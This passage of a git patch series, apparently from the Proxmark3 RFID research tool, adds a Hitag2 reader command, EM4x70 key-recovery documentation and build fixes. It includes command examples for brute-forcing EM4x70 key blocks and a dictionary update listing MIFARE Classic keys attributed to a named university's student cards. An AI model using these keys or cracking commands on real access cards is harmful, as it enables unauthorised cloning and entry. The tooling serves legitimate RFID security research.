Hitag2 tags until Enter or the pm3 button is pressed\n", + "lf hitag reader\n" + "lf hitag reader -@ -> Continuous mode" + ); void *argtable[] = { arg_param_begin, diff --git a/client/src/cmdtrace.c b/client/src/cmdtrace.c index b4191c94d..da8382118 100644 --- a/client/src/cmdtrace.c +++ b/client/src/cmdtrace.c @@ -646,7 +646,7 @@ static uint16_t printTraceLine(uint16_t tracepos, uint16_t traceLen, uint8_t *tr // handle partial bytes. The parity array[0] is used to store number of left over bits from NBYTES // This part prints the number of bits in the trace entry for hitag. uint8_t nbits = parityBytes[0]; - + // only apply this to lesser than one byte if (data_len == 1) { diff --git a/client/src/graph.c b/client/src/graph.c index 50b31abf1..bf5a042c0 100644 --- a/client/src/graph.c +++ b/client/src/graph.c @@ -613,13 +613,13 @@ size_t restore_buffer8(buffer_savestate_t saveState, uint8_t *dest) { // Unpack the array for (size_t i = 0; i < saveState.bufferSize; i++) { dest[index++] = saveState.buffer[i]; - if(index == length) break; + if (index == length) break; dest[index++] = (saveState.buffer[i] >> 8) & 0xFF; - if(index == length) break; + if (index == length) break; dest[index++] = (saveState.buffer[i] >> 16) & 0xFF; - if(index == length) break; + if (index == length) break; dest[index++] = (saveState.buffer[i] >> 24) & 0xFF; - if(index == length) break; + if (index == length) break; } return index; diff --git a/client/src/pm3line_vocabulary.h b/client/src/pm3line_vocabulary.h index 2cb832da4..9ab543d4a 100644 --- a/client/src/pm3line_vocabulary.h +++ b/client/src/pm3line_vocabulary.h @@ -623,6 +623,7 @@ const static vocabulary_t vocabulary[] = { { 0, "lf em 4x70 auth" }, { 0, "lf em 4x70 setpin" }, { 0, "lf em 4x70 setkey" }, + { 1, "lf em 4x70 calc" }, { 1, "lf em 4x70 recover" }, { 0, "lf em 4x70 autorecover" }, { 1, "lf fdxb help" }, @@ -650,6 +651,7 @@ const static vocabulary_t vocabulary[] = { { 1, "lf hitag help" }, { 1, "lf hitag list" }, { 0, "lf hitag info" }, + { 0, "lf hitag reader" }, { 1, "lf hitag test" }, { 0, "lf hitag dump" }, { 0, "lf hitag read" }, diff --git a/doc/commands.json b/doc/commands.json index 1cf347b1d..90890ad22 100644 --- a/doc/commands.json +++ b/doc/commands.json @@ -9016,11 +9016,29 @@ ], "usage": "lf em 4x70 autorecover [-h] [--par] --rnd --frn --grn " }, + "lf em 4x70 calc": { + "command": "lf em 4x70 calc", + "description": "Calculates both the reader and tag challenge for a user-provided key and rnd.", + "notes": [ + "lf em 4x70 calc --key F32AA98CF5BE4ADFA6D3480B --rnd 45F54ADA252AAC (pm3 test key)", + "lf em 4x70 calc --key A090A0A02080000000000000 --rnd 3FFE1FB6CC513F (research paper key)", + "lf em 4x70 calc --key 022A028C02BE000102030405 --rnd 7D5167003571F8 (autorecovery test key)" + ], + "offline": true, + "options": [ + "-h, --help This help", + "--key Key 96-bit as 12 hex bytes", + "--rnd 56-bit random value sent to tag for authentication" + ], + "usage": "lf em 4x70 calc [-h] --key --rnd " + }, "lf em 4x70 help": { "command": "lf em 4x70 help", - "description": "help This help recover Recover remaining key from partial key --------------------------------------------------------------------------------------- lf em 4x70 brute available offline: no Optimized partial key-update attack of 16-bit key block 7, 8 or 9 of an EM4x70 This attack does NOT write anything to the tag. Before starting this attack, 0000 must be written to the 16-bit key block: 'lf em 4x70 write -b 9 -d 0000'. After success, the 16-bit key block have to be restored with the key found: 'lf em 4x70 write -b 9 -d c0de'", + "description": "help This help calc Calculate EM4x70 challenge and response recover Recover remaining key from partial key --------------------------------------------------------------------------------------- lf em 4x70 brute available offline: no Optimized partial key-update attack of 16-bit key block 7, 8 or 9 of an EM4x70 This attack does NOT write anything to the tag. Before starting this attack, 0000 must be written to the 16-bit key block: 'lf em 4x70 write -b 9 -d 0000'. After success, the 16-bit key block have to be restored with the key found: 'lf em 4x70 write -b 9 -d c0de'", "notes": [ - "lf em 4x70 brute -b 9 --rnd 45F54ADA252AAC --frn 4866BB70 -> bruteforcing key bits k95...k80" + "lf em 4x70 brute -b 9 --rnd 45F54ADA252AAC --frn 4866BB70 -> bruteforcing key bits k95...k80 (pm3 test key)", + "lf em 4x70 brute -b 8 --rnd 3FFE1FB6CC513F --frn F355F1A0 -> bruteforcing key bits k79...k64 (research paper key)", + "lf em 4x70 brute -b 7 --rnd 7D5167003571F8 --frn 982DBCC0 -> bruteforcing key bits k63...k48 (autorecovery test key)" ], "offline": true, "options": [ @@ -9052,7 +9070,8 @@ "description": "After obtaining key bits 95..48 (such as via 'lf em 4x70 brute'), this command will recover key bits 47..00. By default, this process does NOT require a tag to be present. By default, the potential keys are shown (typically 1-6) along with a corresponding 'lf em 4x70 auth' command that will authenticate, if that potential key is correct. The user can copy/paste these commands when the tag is present to manually check which of the potential keys is correct.", "notes": [ "lf em 4x70 recover --key F32AA98CF5BE --rnd 45F54ADA252AAC --frn 4866BB70 --grn 9BD180 (pm3 test key)", - "lf em 4x70 recover --key A090A0A02080 --rnd 3FFE1FB6CC513F --frn F355F1A0 --grn 609D60 (research paper key)" + "lf em 4x70 recover --key A090A0A02080 --rnd 3FFE1FB6CC513F --frn F355F1A0 --grn 609D60 (research paper key)", + "lf em 4x70 recover --key 022A028C02BE --rnd 7D5167003571F8 --frn 982DBCC0 --grn 36C0E0 (autorecovery test key)" ], "offline": true, "options": [ @@ -9518,7 +9537,7 @@ "-h, --help This help", "--nrar specify nonce / answer as 8 hex bytes" ], - "usage": "lf hitag lookup [-h] [--nrar ]" + "usage": "lf hitag crack2 [-h] [--nrar ]" }, "lf hitag dump": { "command": "lf hitag dump", @@ -9653,6 +9672,20 @@ ], "usage": "lf hitag read [-hs2] [--pwd] [--nrar ] [--crypto] [-k ]" }, + "lf hitag reader": { + "command": "lf hitag reader", + "description": "Act as a Hitag2 reader. Look for Hitag2 tags until Enter or the pm3 button is pressed", + "notes": [ + "lf hitag reader", + "lf hitag reader -@ -> Continuous mode" + ], + "offline": false, + "options": [ + "-h, --help This help", + "-@ continuous reader mode" + ], + "usage": "lf hitag reader [-h@]" + }, "lf hitag sim": { "command": "lf hitag sim", "description": "Simulate Hitag transponder You need to `lf hitag eload` first", @@ -12699,8 +12732,8 @@ } }, "metadata": { - "commands_extracted": 735, + "commands_extracted": 737, "extracted_by": "PM3Help2JSON v1.00", - "extracted_on": "2024-05-14T08:02:41" + "extracted_on": "2024-05-27T13:38:05" } } diff --git a/doc/commands.md b/doc/commands.md index e010a8a17..dd7f275a4 100644 --- a/doc/commands.md +++ b/doc/commands.md @@ -979,6 +979,7 @@ Check column "offline" for their availability. |`lf em 4x70 auth `|N |`Authenticate EM4x70` |`lf em 4x70 setpin `|N |`Write PIN` |`lf em 4x70 setkey `|N |`Write key` +|`lf em 4x70 calc `|Y |`Calculate EM4x70 challenge and response` |`lf em 4x70 recover `|Y |`Recover remaining key from partial key` |`lf em 4x70 autorecover `|N |`Recover entire key from writable tag` @@ -1046,6 +1047,7 @@ Check column "offline" for their availability. |`lf hitag help `|Y |`This help` |`lf hitag list `|Y |`List Hitag trace history` |`lf hitag info `|N |`Hitag 2 tag information` +|`lf hitag reader `|N |`Act line an Hitag 2 reader` |`lf hitag test `|Y |`Perform self tests` |`lf hitag dump `|N |`Dump Hitag 2 tag` |`lf hitag read `|N |`Read Hitag memory` From 897643f4cc75e9a3d38819f6b9aa2a48ccdbbfa9 Mon Sep 17 00:00:00 2001 From: ikarus Date: Mon, 27 May 2024 21:19:13 +0200 Subject: [PATCH 015/112] add keys from MCT project --- client/dictionaries/mfc_default_keys.dic | 25 ++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index c8b1d4372..10072a3b1 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -1114,6 +1114,14 @@ EA0FD73CB149 FC0001877BF7 FD8705E721B0 00ADA2CD516D +518108E061E2 +558AAD64EB5B +001122334455 +6CA761AB6CA7 +B1C4A8F7F6E3 +FF75AFDA5A3C +FCDDF7767C10 +A6B3F6C8F1D4 # # 237A4D0D9119 @@ -2424,3 +2432,20 @@ EC2B9FD483CA # InsideWash Membership Card - Portugal C18063858BB9 + +# Universidade de São Paulo (USP) student card +17B50E38F1B0 +24E311F594CE +3794FBFB1A54 +43B229069F6A +4531952F765F +4943F2F35E0A +4985E681EF88 +4F56C88E0337 +710070E92C79 +8A036C5C35D4 +A027BD830A06 +D33673C19243 +D89A506542F2 +E5813CD228F1 +FAB943906E9C From 98acac3fc2cbe2cc5cae6fa3d64d959b82dacda7 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 28 May 2024 09:52:27 +0200 Subject: [PATCH 016/112] fix unused warning --- .../hitag2crack/crack5opencl/ht2crack5opencl.c | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/tools/hitag2crack/crack5opencl/ht2crack5opencl.c b/tools/hitag2crack/crack5opencl/ht2crack5opencl.c index 21829adf5..dae4e20f0 100644 --- a/tools/hitag2crack/crack5opencl/ht2crack5opencl.c +++ b/tools/hitag2crack/crack5opencl/ht2crack5opencl.c @@ -705,21 +705,28 @@ int main(int argc, char **argv) { // show buidlog in case of error // todo: only for device models unsigned int build_errors = 0; - unsigned int build_logs = 0; + // unsigned int build_logs = 0; cl_command_queue_properties queue_properties = 0; - if (opencl_profiling) queue_properties = CL_QUEUE_PROFILING_ENABLE; + if (opencl_profiling) { + queue_properties = CL_QUEUE_PROFILING_ENABLE; + } // setup, phase 1 z = 0; // dolphin for (w = 0; w < ocl_platform_cnt; w++) { - if (!cd_ctx[w].selected) continue; + if (!cd_ctx[w].selected) { + continue; + } for (q = 0; q < cd_ctx[w].device_cnt; q++) { - if (!cd_ctx[w].device[q].selected) continue; + + if (!cd_ctx[w].device[q].selected) { + continue; + } ctx.device_ids[z] = cd_ctx[w].device[q].device_id; @@ -860,7 +867,7 @@ int main(int argc, char **argv) { free(buffer); - build_logs++; + // build_logs++; #if DEBUGME == 0 continue; // todo: evaluate this, one or more can be broken, so continue #endif From 6bdfe11c1a4fca832f112e3f54734d9ee824852d Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 28 May 2024 10:00:11 +0200 Subject: [PATCH 017/112] minor fixes --- armsrc/lfsampling.c | 30 ++++++++++++++++++++++-------- client/src/cmddata.c | 2 +- 2 files changed, 23 insertions(+), 9 deletions(-) diff --git a/armsrc/lfsampling.c b/armsrc/lfsampling.c index 88787b4e1..b8eaf2b44 100644 --- a/armsrc/lfsampling.c +++ b/armsrc/lfsampling.c @@ -134,10 +134,11 @@ void initSampleBuffer(uint32_t *sample_size) { } void initSampleBufferEx(uint32_t *sample_size, bool use_malloc) { + if (sample_size == NULL) { - Dbprintf("initSampleBufferEx, param NULL"); return; } + BigBuf_free_keep_EM(); // We can't erase the buffer now, it would drastically delay the acquisition @@ -181,14 +182,26 @@ void logSampleSimple(uint8_t sample) { void logSample(uint8_t sample, uint8_t decimation, uint8_t bits_per_sample, bool avg) { - if (!data.buffer) return; + if (!data.buffer) { + return; + } // keep track of total gather samples regardless how many was discarded. - if (samples.counter-- == 0) return; + if (samples.counter-- == 0) { + return; + } - if (bits_per_sample == 0) bits_per_sample = 1; - if (bits_per_sample > 8) bits_per_sample = 8; - if (decimation == 0) decimation = 1; + if (bits_per_sample == 0) { + bits_per_sample = 1; + } + + if (bits_per_sample > 8) { + bits_per_sample = 8; + } + + if (decimation == 0) { + decimation = 1; + } if (avg) { samples.sum += sample; @@ -198,7 +211,9 @@ void logSample(uint8_t sample, uint8_t decimation, uint8_t bits_per_sample, bool if (decimation > 1) { samples.dec_counter++; - if (samples.dec_counter < decimation) return; + if (samples.dec_counter < decimation) { + return; + } samples.dec_counter = 0; } @@ -542,7 +557,6 @@ out: LED_D_OFF(); // DoAcquisition() end - StopTicks(); FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); return return_value; diff --git a/client/src/cmddata.c b/client/src/cmddata.c index 1ce0aadef..2a5b2474a 100644 --- a/client/src/cmddata.c +++ b/client/src/cmddata.c @@ -2769,7 +2769,7 @@ static int CmdAsn1Decoder(const char *Cmd) { void *argtable[] = { arg_param_begin, arg_str0("d", NULL, "", "ASN1 encoded byte array"), - arg_lit0("t", "test", "perform self test"), + arg_lit0(NULL, "test", "perform self tests"), arg_param_end }; CLIExecWithReturn(ctx, Cmd, argtable, false); From adfbcbc193c61e26ad9d9ffff786a61b0582c3b2 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 28 May 2024 10:14:02 +0200 Subject: [PATCH 018/112] miscchecks white space --- client/src/cmdlfhitag.c | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/client/src/cmdlfhitag.c b/client/src/cmdlfhitag.c index 1705bf50f..f073f5398 100644 --- a/client/src/cmdlfhitag.c +++ b/client/src/cmdlfhitag.c @@ -2315,11 +2315,11 @@ static int CmdLFHitag2Crack2(const char *Cmd) { http://www.mikrocontroller.net/attachment/102194/hitag2.c Written by "I.C. Wiener 2006-2007" - "MIKRON" = O N M I K R - Key = 4F 4E 4D 49 4B 52 - Secret 48-bit key - Serial = 49 43 57 69 - Serial number of the tag, transmitted in clear - Random = 65 6E 45 72 - Random IV, transmitted in clear - ~28~DC~80~31 = D7 23 7F CE - Authenticator value = inverted first 4 bytes of the keystream + "MIKRON" = O N M I K R + Key = 4F 4E 4D 49 4B 52 - Secret 48-bit key + Serial = 49 43 57 69 - Serial number of the tag, transmitted in clear + Random = 65 6E 45 72 - Random IV, transmitted in clear + ~28~DC~80~31 = D7 23 7F CE - Authenticator value = inverted first 4 bytes of the keystream The code below must print out "D7 23 7F CE 8C D0 37 A9 57 49 C1 E6 48 00 8A B6". The inverse of the first 4 bytes is sent to the tag to authenticate. From 54644c61138ba97dcf01d799e12f6c4fcd429d38 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 28 May 2024 10:27:23 +0200 Subject: [PATCH 019/112] update cmakefile with changes from client cmake --- client/experimental_lib/CMakeLists.txt | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/client/experimental_lib/CMakeLists.txt b/client/experimental_lib/CMakeLists.txt index 0342fcf08..629ce63ab 100644 --- a/client/experimental_lib/CMakeLists.txt +++ b/client/experimental_lib/CMakeLists.txt @@ -46,6 +46,7 @@ endif() find_package(PkgConfig) if (NOT SKIPQT EQUAL 1) + if(APPLE AND EXISTS /usr/local/opt/qt5) # Homebrew installs Qt5 (up to at least 5.11.0) in # /usr/local/opt/qt5. Ensure that it can be found by CMake @@ -56,16 +57,17 @@ if (NOT SKIPQT EQUAL 1) # e.g. find_package(Qt5Core ${QT_FIND_PACKAGE_OPTIONS}) list(APPEND QT_FIND_PACKAGE_OPTIONS PATHS /usr/local/opt/qt5) endif(APPLE AND EXISTS /usr/local/opt/qt5) - if(APPLE AND EXISTS /opt/homebrew/opt/qt5) + + if(APPLE AND EXISTS /opt/homebrew/opt/qt@5) # Homebrew on Apple Silicon installs Qt5 in - # /opt/homebrew/opt/qt5. Ensure that it can be found by CMake + # /opt/homebrew/opt/qt@5. Ensure that it can be found by CMake # since it is not in the default /usr/local prefix. # Add it to PATHS so that it doesn't override the # CMAKE_PREFIX_PATH environment variable. # QT_FIND_PACKAGE_OPTIONS should be passed to find_package, # e.g. find_package(Qt5Core ${QT_FIND_PACKAGE_OPTIONS}) - list(APPEND QT_FIND_PACKAGE_OPTIONS PATHS /opt/homebrew/opt/qt5) - endif(APPLE AND EXISTS /opt/homebrew/opt/qt5) + list(APPEND QT_FIND_PACKAGE_OPTIONS PATHS /opt/homebrew/opt/qt@5) + endif(APPLE AND EXISTS /opt/homebrew/opt/qt@5) set(QT_PACKAGELIST Qt5Core Qt5Widgets @@ -262,6 +264,7 @@ set (TARGET_SOURCES ${PM3_ROOT}/common/cardhelper.c ${PM3_ROOT}/common/generator.c ${PM3_ROOT}/common/bruteforce.c + ${PM3_ROOT}/common/hitag2/hitag2_crypto.c ${PM3_ROOT}/client/src/crypto/asn1dump.c ${PM3_ROOT}/client/src/crypto/asn1utils.c ${PM3_ROOT}/client/src/crypto/libpcrypto.c @@ -357,6 +360,7 @@ set (TARGET_SOURCES ${PM3_ROOT}/client/src/cmdhfthinfilm.c ${PM3_ROOT}/client/src/cmdhftopaz.c ${PM3_ROOT}/client/src/cmdhfvas.c + ${PM3_ROOT}/client/src/cmdhfving.c ${PM3_ROOT}/client/src/cmdhfxerox.c ${PM3_ROOT}/client/src/cmdhw.c ${PM3_ROOT}/client/src/cmdlf.c @@ -455,7 +459,6 @@ if (APPLE) message(STATUS "AppKit.framework found! ${APPKIT_LIBRARY}") set(ADDITIONAL_LNK "-framework Foundation" "-framework AppKit") endif() - endif (APPLE) if ((NOT SKIPQT EQUAL 1) AND (Qt5_FOUND)) @@ -675,6 +678,8 @@ if (NOT SKIPPYTHON EQUAL 1) endif (NOT SKIPPYTHON EQUAL 1) message(STATUS "===================================================================") +add_definitions(-DHAVE_SNPRINTF) + add_library(pm3rrg_rdv4 SHARED ${PM3_ROOT}/client/src/proxmark3.c ${TARGET_SOURCES} @@ -733,6 +738,9 @@ target_include_directories(pm3rrg_rdv4 PRIVATE if (NOT APPLE) # required for Raspberry Pi, but breaks with clang (OSX). Need to be at the end of the linker line. set(ADDITIONAL_LNK ${ADDITIONAL_LNK} -Wl,--as-needed -latomic -Wl,--no-as-needed) +else (NOT APPLE) + #set_property(TARGET proxmark3 PROPERTY LINK_FLAGS "-Wl,-undefined dynamic_lookup") + set(ADDITIONAL_LNK ${ADDITIONAL_LNK} -Wl,-undefined,dynamic_lookup) endif (NOT APPLE) if (NOT JANSSON_FOUND) @@ -760,6 +768,7 @@ target_link_libraries(pm3rrg_rdv4 PRIVATE pm3rrg_rdv4_reveng pm3rrg_rdv4_hardnested pm3rrg_rdv4_id48 + pm3rrg_rdv4_xml ${ADDITIONAL_LNK}) if (NOT SKIPPTHREAD EQUAL 1) From d6356bd3f446619ec7fe30e3ea5f6fdd2e08b9da Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 28 May 2024 10:30:40 +0200 Subject: [PATCH 020/112] wrong file --- client/experimental_lib/CMakeLists.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/client/experimental_lib/CMakeLists.txt b/client/experimental_lib/CMakeLists.txt index 629ce63ab..f1e6d6e76 100644 --- a/client/experimental_lib/CMakeLists.txt +++ b/client/experimental_lib/CMakeLists.txt @@ -360,7 +360,6 @@ set (TARGET_SOURCES ${PM3_ROOT}/client/src/cmdhfthinfilm.c ${PM3_ROOT}/client/src/cmdhftopaz.c ${PM3_ROOT}/client/src/cmdhfvas.c - ${PM3_ROOT}/client/src/cmdhfving.c ${PM3_ROOT}/client/src/cmdhfxerox.c ${PM3_ROOT}/client/src/cmdhw.c ${PM3_ROOT}/client/src/cmdlf.c From 4a4e7bc27f2703f8e276933af024f5b5f4b4c889 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 28 May 2024 10:32:50 +0200 Subject: [PATCH 021/112] wrong lib --- client/experimental_lib/CMakeLists.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/client/experimental_lib/CMakeLists.txt b/client/experimental_lib/CMakeLists.txt index f1e6d6e76..2b665414a 100644 --- a/client/experimental_lib/CMakeLists.txt +++ b/client/experimental_lib/CMakeLists.txt @@ -767,7 +767,6 @@ target_link_libraries(pm3rrg_rdv4 PRIVATE pm3rrg_rdv4_reveng pm3rrg_rdv4_hardnested pm3rrg_rdv4_id48 - pm3rrg_rdv4_xml ${ADDITIONAL_LNK}) if (NOT SKIPPTHREAD EQUAL 1) From efcfd3e1265710e108922071660ea00cbfde9381 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 28 May 2024 10:36:23 +0200 Subject: [PATCH 022/112] text --- CHANGELOG.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index 1b1aa773a..321b73266 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,6 +3,8 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] + +## [Aurora][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) - Changed `mem spiffs tree` - adapted to bigbuff and show if empty (@iceman1001) - Changed `lf hitag info` - now tries to identify different key fob emulators (@iceman1001) From aceed281e83ed595b4fafa59fdea68ef477c4549 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 28 May 2024 10:36:31 +0200 Subject: [PATCH 023/112] Release v4.18589 - Aurora --- Makefile.defs | 4 ++-- armsrc/Makefile | 2 +- bootrom/Makefile | 2 +- client/CMakeLists.txt | 4 ++-- client/Makefile | 4 ++-- client/deps/amiibo.cmake | 2 +- client/deps/cliparser.cmake | 2 +- client/deps/hardnested.cmake | 18 ++++++++-------- client/deps/id48lib.cmake | 2 +- client/deps/jansson.cmake | 2 +- client/deps/lua.cmake | 2 +- client/deps/mbedtls.cmake | 2 +- client/deps/reveng.cmake | 2 +- client/deps/tinycbor.cmake | 2 +- client/deps/whereami.cmake | 2 +- client/experimental_lib/CMakeLists.txt | 2 +- client/src/proxmark3.c | 2 +- common/default_version_pm3.c | 29 +++++++------------------- common_arm/Makefile.common | 2 +- 19 files changed, 36 insertions(+), 51 deletions(-) diff --git a/Makefile.defs b/Makefile.defs index 1ef2aa09d..aadb1a98b 100644 --- a/Makefile.defs +++ b/Makefile.defs @@ -112,8 +112,8 @@ ifeq ($(DEBUG),1) DEFCFLAGS = -g -O0 -fstrict-aliasing -pipe DEFLDFLAGS = else - DEFCXXFLAGS = -Wall -Werror -O3 -pipe - DEFCFLAGS = -Wall -Werror -O3 -fstrict-aliasing -pipe + DEFCXXFLAGS = -Wall -O3 -pipe + DEFCFLAGS = -Wall -O3 -fstrict-aliasing -pipe DEFLDFLAGS = endif diff --git a/armsrc/Makefile b/armsrc/Makefile index 2f27534ef..b9b101396 100644 --- a/armsrc/Makefile +++ b/armsrc/Makefile @@ -185,7 +185,7 @@ showinfo: # version_pm3.c should be checked on every time fullimage.stage1.elf should be remade version_pm3.c: default_version_pm3.c $(OBJDIR)/fpga_version_info.o $(OBJDIR)/fpga_all.o $(THUMBOBJ) $(ARMOBJ) .FORCE $(info [-] CHECK $@) - $(Q)$(SH) ../tools/mkversion.sh $@ || $(CP) $< $@ + $(Q)$(CP) $< $@ fpga_version_info.c: $(FPGA_BITSTREAMS) $(FPGA_COMPRESSOR) $(info [-] GEN $@) diff --git a/bootrom/Makefile b/bootrom/Makefile index b6825530d..86c785cd1 100644 --- a/bootrom/Makefile +++ b/bootrom/Makefile @@ -56,7 +56,7 @@ OBJS = $(OBJDIR)/bootrom.s19 # version_pm3.c should be checked on every compilation version_pm3.c: default_version_pm3.c .FORCE $(info [=] CHECK $@) - $(Q)$(SH) ../tools/mkversion.sh $@ || $(CP) $< $@ + $(Q)$(CP) $< $@ all: showinfo $(OBJS) diff --git a/client/CMakeLists.txt b/client/CMakeLists.txt index 4169b8b57..c17cf32b6 100644 --- a/client/CMakeLists.txt +++ b/client/CMakeLists.txt @@ -426,7 +426,7 @@ set (TARGET_SOURCES add_custom_command( OUTPUT ${CMAKE_BINARY_DIR}/version_pm3.c - COMMAND sh ${PM3_ROOT}/tools/mkversion.sh ${CMAKE_BINARY_DIR}/version_pm3.c || ${CMAKE_COMMAND} -E copy ${PM3_ROOT}/common/default_version_pm3.c ${CMAKE_BINARY_DIR}/version_pm3.c + COMMAND ${CMAKE_COMMAND} -E copy ${PM3_ROOT}/common/default_version_pm3.c ${CMAKE_BINARY_DIR}/version_pm3.c DEPENDS ${PM3_ROOT}/common/default_version_pm3.c ) @@ -684,7 +684,7 @@ add_executable(proxmark3 ${ADDITIONAL_SRC} ) -target_compile_options(proxmark3 PUBLIC -Wall -Werror -O3) +target_compile_options(proxmark3 PUBLIC -Wall -O3) if (EMBED_READLINE) if (NOT SKIPREADLINE EQUAL 1) add_dependencies(proxmark3 ncurses readline) diff --git a/client/Makefile b/client/Makefile index 1b7090f68..f69467f6b 100644 --- a/client/Makefile +++ b/client/Makefile @@ -446,7 +446,7 @@ endif PM3CFLAGS += -DHAVE_SNPRINTF -CXXFLAGS ?= -Wall -Werror +CXXFLAGS ?= -Wall CXXFLAGS += $(MYDEFS) $(MYCXXFLAGS) $(MYINCLUDES) PM3CXXFLAGS = $(CXXFLAGS) @@ -977,7 +977,7 @@ src/pm3_pywrap.c: pm3.i # version_pm3.c should be checked on every compilation src/version_pm3.c: default_version_pm3.c .FORCE $(info [=] CHECK $@) - $(Q)$(SH) ../tools/mkversion.sh $@ || $(CP) $< $@ + $(Q)$(CP) $< $@ # easy printing of MAKE VARIABLES print-%: ; @echo $* = $($*) diff --git a/client/deps/amiibo.cmake b/client/deps/amiibo.cmake index c946c0682..8c524c170 100644 --- a/client/deps/amiibo.cmake +++ b/client/deps/amiibo.cmake @@ -19,7 +19,7 @@ target_link_libraries(pm3rrg_rdv4_amiibo PRIVATE m pm3rrg_rdv4_mbedtls) -target_compile_options(pm3rrg_rdv4_amiibo PRIVATE -Wall -Werror -O3) +target_compile_options(pm3rrg_rdv4_amiibo PRIVATE -Wall -O3) set_property(TARGET pm3rrg_rdv4_amiibo PROPERTY POSITION_INDEPENDENT_CODE ON) target_include_directories(pm3rrg_rdv4_amiibo PRIVATE amiitool diff --git a/client/deps/cliparser.cmake b/client/deps/cliparser.cmake index fccae33b7..a85cc2374 100644 --- a/client/deps/cliparser.cmake +++ b/client/deps/cliparser.cmake @@ -9,5 +9,5 @@ target_include_directories(pm3rrg_rdv4_cliparser PRIVATE ../../include ../src) target_include_directories(pm3rrg_rdv4_cliparser INTERFACE cliparser) -target_compile_options(pm3rrg_rdv4_cliparser PRIVATE -Wall -Werror -O3) +target_compile_options(pm3rrg_rdv4_cliparser PRIVATE -Wall -O3) set_property(TARGET pm3rrg_rdv4_cliparser PROPERTY POSITION_INDEPENDENT_CODE ON) diff --git a/client/deps/hardnested.cmake b/client/deps/hardnested.cmake index ec545e2a8..468ee4ef2 100644 --- a/client/deps/hardnested.cmake +++ b/client/deps/hardnested.cmake @@ -2,7 +2,7 @@ add_library(pm3rrg_rdv4_hardnested_nosimd OBJECT hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) -target_compile_options(pm3rrg_rdv4_hardnested_nosimd PRIVATE -Wall -Werror -O3) +target_compile_options(pm3rrg_rdv4_hardnested_nosimd PRIVATE -Wall -O3) set_property(TARGET pm3rrg_rdv4_hardnested_nosimd PROPERTY POSITION_INDEPENDENT_CODE ON) target_include_directories(pm3rrg_rdv4_hardnested_nosimd PRIVATE @@ -32,7 +32,7 @@ if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_mmx PRIVATE -Wall -Werror -O3) + target_compile_options(pm3rrg_rdv4_hardnested_mmx PRIVATE -Wall -O3) target_compile_options(pm3rrg_rdv4_hardnested_mmx BEFORE PRIVATE -mmmx -mno-sse2 -mno-avx -mno-avx2 -mno-avx512f) set_property(TARGET pm3rrg_rdv4_hardnested_mmx PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -47,7 +47,7 @@ if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_sse2 PRIVATE -Wall -Werror -O3) + target_compile_options(pm3rrg_rdv4_hardnested_sse2 PRIVATE -Wall -O3) target_compile_options(pm3rrg_rdv4_hardnested_sse2 BEFORE PRIVATE -mmmx -msse2 -mno-avx -mno-avx2 -mno-avx512f) set_property(TARGET pm3rrg_rdv4_hardnested_sse2 PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -62,7 +62,7 @@ if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_avx PRIVATE -Wall -Werror -O3) + target_compile_options(pm3rrg_rdv4_hardnested_avx PRIVATE -Wall -O3) target_compile_options(pm3rrg_rdv4_hardnested_avx BEFORE PRIVATE -mmmx -msse2 -mavx -mno-avx2 -mno-avx512f) set_property(TARGET pm3rrg_rdv4_hardnested_avx PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -77,7 +77,7 @@ if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_avx2 PRIVATE -Wall -Werror -O3) + target_compile_options(pm3rrg_rdv4_hardnested_avx2 PRIVATE -Wall -O3) target_compile_options(pm3rrg_rdv4_hardnested_avx2 BEFORE PRIVATE -mmmx -msse2 -mavx -mavx2 -mno-avx512f) set_property(TARGET pm3rrg_rdv4_hardnested_avx2 PROPERTY POSITION_INDEPENDENT_CODE ON) @@ -92,7 +92,7 @@ if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) hardnested/hardnested_bf_core.c hardnested/hardnested_bitarray_core.c) - target_compile_options(pm3rrg_rdv4_hardnested_avx512 PRIVATE -Wall -Werror -O3) + target_compile_options(pm3rrg_rdv4_hardnested_avx512 PRIVATE -Wall -O3) target_compile_options(pm3rrg_rdv4_hardnested_avx512 BEFORE PRIVATE -mmmx -msse2 -mavx -mavx2 -mavx512f) 